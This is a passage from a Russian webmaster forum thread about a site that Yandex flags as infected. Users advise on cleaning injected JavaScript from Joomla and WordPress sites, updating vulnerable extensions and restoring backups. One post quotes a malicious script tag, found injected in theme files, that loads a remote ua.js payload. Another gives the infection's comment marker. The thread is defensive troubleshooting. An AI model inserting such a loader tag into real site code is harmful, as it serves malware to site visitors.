На моем сайте вирус по версии Яндекса

atranca
На сайте с 27.02.2011
Offline
125
#11
Rxp:
ТС обычно яндекс ставит метку правильно, внешний вирус можете не увидеть, например он может показываться раз в сутки, проверьте шаблон корневые файлы сайта.

Если сами не справитесь стучите проверим сайт на вирусы + дадим рекомендации!

я ж там написал, что не вирус (да и по версии яндекса не вирус)- там накрутка поведенческих...

Не знаю зачем она поиск по сайту ввиде ссылки оформила- получается что по ее сайту с этой страници всегда ищут люди одну и ту-же фразу

123
Y
На сайте с 11.11.2012
Offline
33
#12

самый простой способ добавить сайт в гугле панель вебмастера

и все вредоносные коды вы увидеть как на ладони

JohnGonzo
На сайте с 06.04.2009
Offline
143
#13

У меня такая же штука была. Очень успешно использовал Kaspersky Virus Removal Tool. Определил всю грязь и вычистил ее. Рекомендую. К тому же это бесплатно.

Повышение квалификации строителей, МЧС, энергобезопасности, охране труда, отходам, рабочие специальности, пожарной безопасности (https://helion-ltd.ru/pipk/)
Max1m
На сайте с 08.12.2008
Offline
115
#14

Сайт на Джумле? У вас скорее всего заражены .js файлы на хостинге через дыру :) Ну а дальше дело техники подгружать iframe.

Мой блог - anticorporativ.ru ( https://anticorporativ.ru ) | Мой канал в телеге (3,4к следят) - подписаться ( tg://resolve?domain=max_fuckin )
A
На сайте с 12.12.2008
Offline
194
#15

Вот еще одна хрень, за которую Я звездочку ставит

<script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script><script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script>

Находится обычно wp-includes/functions.php и в header.php

Как бороться? Шеллов нигдеинет, хостинги разные. Приходится с айболитом вместе сидеть, но он много не видит. Как он прописывает этот скрипт, если права 444 стоят??

Вечные ссылки (/ru/forum/962266) на моих сайтах.
S
На сайте с 15.04.2010
Offline
23
#16

http://viju.tvercity.net/ru/weblog/removing-mallware-5-apr-2012

Читаем.

Долго не копался - но я так понял - что подобран пароль по фтп у вас и заменен код в js скрипте. Отсюда и ваши 444 не играют роль.

Сайт на Джумле? У вас скорее всего заражены .js файлы на хостинге через дыру Ну а дальше дело техники подгружать iframe.

В таком случае - переписан был индексный файн php - и вместо сайта у вас редирект бы стоял на что нить hacked by... Если такого нет - нужно просмотреть index.php - если он по умолчанию - и проверить строки с началом на echo - а дальше в коде ссылка на какой нить сайт. http://*** (этот код вызывал был js скрипт с другого сайта, который бы и приводил в действие вышеупомянутый iframe) - просто тупо ее удалить.

Посмотрите последние даты изменения файлов сайта (php, js)- если даты недавние и в одно и тоже время - сделайте через хостинг-провайдера откат на дату раньше. Базу Mysql можно скопировать на состояние сегодняшнего дня. Потом по восстановлению файлов CMS - восстановить все данные уже на рабочий движок.

O3
На сайте с 27.11.2010
Offline
28
#17

Скорее всего и htaccess заражен и скрипт стоит, который эту заразу будет постоянно распространять... Ищите кого-то, кто почистит сайт... У меня такое было сразу на 10 сайтов... За 100 долларов мне почистили...

Рейтинг брокеров форекс (http://www.topbrokers.com.ua/) Интересные новости (http://pro100news.info/) Бездепозитные бонусы форекс (http://ru-trade.info/vse-bezdepozitnye-bonusy-foreks-brokerov/)
A
На сайте с 06.05.2013
Offline
2
#18
Light_And_Dark:
На прошлой неделе Яндекс стал кричать что обнаружен вирус на одной из страниц моего сайта с вердиктом - поведенческий анализ:
http://haircolor.org.ua/texniki/item/145-okrashivanie-ombre.html
Это наиболее посещаемая страница из второстепенных. Посещаемость естественно упала с яши. Я проверила код и не нашла вроде ничего нового. Но я php и html знаю не очень.
Сделала проверку сайта на antivirus-alarm.ru
В результатах обнаружено только: VIPRE Malware.JS.Generic (JS). Все остальные базы молчат.
http://antivirus-alarm.ru/proverka/?url=haircolor.org.ua%2Ftexniki%2Fitem%2F145-okrashivanie-ombre.html
Проверка через http://2ip.ru/site-virus-scaner/ показывает подозрение на вирус из-за фрем вставки. Единственный фрейм который я обнаружила в коде - это фрейм плеера, который воспроизводить видео с ютуб. Что вирусом не является.
Заказала повторную проверку в яндексе. Она через 2 дня сняла информацию о вирусе, но стона через 3 дня она появилась. С той же страницей.
С гуглом все в порядке, а вот с Яшей что делать не знаю.
Подскажите в чем может быть проблема и как ее решить?

Добро пожаловать на борт: http://joomlaforum.ru/index.php/topic,258717.0.html

Вкратце. У Вас на сайте вредоносный код в js файлах. Легко найти по ключу: /*214afaae*/. Код постоянно меняется, может сам исчезать, потом появляться снова, но эта метка постоянная. Удалив все закладки кода, Вы на какое-то время избавитесь от метки Яндекса, но не от вируса. Сам код вируса где-то в php файле. Заливают предположительно через старые версии JCE и NoNamber. Их нужно обновить до актуальных. Там тема с пометкой "решено", хотя проблема не решена.

Да, и проверяйте все сайты на аккаунте, если их несколько. Зараза расползается по всем папакам на хостинге.

KiryaBH
На сайте с 07.06.2009
Offline
104
#19
ajvnor:
Добро пожаловать на борт: http://joomlaforum.ru/index.php/topic,258717.0.html
Вкратце. У Вас на сайте вредоносный код в js файлах. Легко найти по ключу: /*214afaae*/. Код постоянно меняется, может сам исчезать, потом появляться снова, но эта метка постоянная. Удалив все закладки кода, Вы на какое-то время избавитесь от метки Яндекса, но не от вируса. Сам код вируса где-то в php файле. Заливают предположительно через старые версии JCE и NoNamber. Их нужно обновить до актуальных. Там тема с пометкой "решено", хотя проблема не решена.
Да, и проверяйте все сайты на аккаунте, если их несколько. Зараза расползается по всем папакам на хостинге.

Аналогично были заражены все сайты на аккаунте. Вроде победил заразу. Вначале грохнул вышеупомянутые плагины/модули. Айболитом выявил все подозрительные файлы по типу 87328a.php, удалил. И затем скриптом far.php вычистил все js файлы от вредоносного кода

ТОПчик среди хостингов! (https://goo.gl/z4QszF) | Дешевая РАБсила (https://goo.gl/8Mg7if) | ПУШИстая партнерка (https://clickstar.me/?ref=35ddc4aa)
Sergey Petrov
На сайте с 01.02.2013
Offline
3
#20

и не забыть обновить модули/CMS до последней версии

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий